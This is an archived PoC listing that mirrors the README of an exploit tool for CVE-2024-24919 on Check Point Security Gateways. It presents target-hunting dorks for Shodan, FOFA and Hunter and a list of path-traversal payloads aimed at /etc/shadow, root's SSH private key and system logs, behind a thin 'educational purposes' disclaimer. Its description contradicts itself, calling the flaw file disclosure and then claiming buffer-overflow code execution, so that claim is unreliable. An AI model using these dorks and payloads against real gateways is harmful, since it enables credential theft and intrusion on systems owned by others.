Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2024-24919 PoC — Check Point Security Gateways 安全漏洞

Source
Associated Vulnerability
Title:Check Point Security Gateways 安全漏洞 (CVE-2024-24919)
Description:Check Point Security Gateways是以色列Check Point公司的一个人工智能驱动的 NGFW 安全网关。 Check Point Security Gateways 存在安全漏洞。攻击者利用该漏洞可以获取敏感信息。
Description
CVE-2024-24919 exploit
Readme
## **Check Point Security Gateway RCE Exploit Tool (CVE-2024-24919)**

### **Overview**

This repository contains a tool for exploiting the **CVE-2024-24919** vulnerability in Check Point Security Gateways. The tool is a multi-scanner that can identify vulnerable devices and a single-target exploit that can take full control of the affected device.

**CVE-2024-24919** is a high-severity information disclosure vulnerability that allows an attacker to remotely read arbitrary files on a Check Point Security Gateway. This vulnerability can be exploited to steal sensitive information, such as passwords and configuration files.

**Disclaimer:**

This tool is provided for educational purposes only. It should not be used to attack vulnerable systems without the explicit consent of the owner. The authors of this tool are not responsible for any damages that may result from its use.

### **How it works**

The exploit works by sending a specially crafted HTTP request to the vulnerable device. The request triggers a buffer overflow in the device's firmware, which allows the attacker to execute arbitrary code. The exploit can then be used to take full control of the device.

### **Requirements**

* Python 3
* colorama
* requests

### **Installation**

```
git clone https://github.com/your-username/cve-2024-24919.git
cd cve-2024-24919
pip install -r requirements.txt
```

### **Usage**

You can scan singel target or multi!

```
python cve-2024-24919.py
```



### **Dorks **

```
# Hunter
Hunter: /product.name="Check Point SSL Network Extender"

# Shodan
SHODAN: http.title="Check Point SSL Network Extender"

# Fofa Query
FOFA: title="Check Point SSL Network Extender"
```

### ** Tool ScreenShot **
![ss](https://github.com/GoatSecurity/CVE-2024-24919/assets/153397256/c0f2dd29-a464-4a24-9356-f0db418c9235)


$ Tool paths :
        ```
        
        'aCSHELL/../../../../../../../../../../../etc/passwd',
        
        'aCSHELL/../../../../../../../../../../../etc/apache2/apache2.conf',
        
        'aCSHELL/../../../../../../../../../../../etc/mysql/my.cnf',
        
        'aCSHELL/../../../../../../../../../../../var/log/syslog',
        
        'aCSHELL/../../../../../../../../../../../var/log/auth.log',
        
        #'aCSHELL/../../../../../../../../../../../var/log/messages',
        
        'aCSHELL/../../../../../../../../../../../etc/group',
        
        'aCSHELL/../../../../../../../../../../../etc/shadow',
        
        'aCSHELL/../../../../../../../../../../../root/.ssh/id_rsa',
        
        'aCSHELL/../../../../../../../../../../../etc/hostname',
        
        'aCSHELL/../../../../../../../../../../../etc/hosts',
        
        'aCSHELL/../../../../../../../../../../../etc/resolv.conf' ```
File Snapshot

[4.0K] /data/pocs/6238d21bd996d2567845f81d1b34e490a4791098 ├── [4.2K] CVE-2024-24919.py ├── [2.7K] README.md └── [ 18] requirements.txt 0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.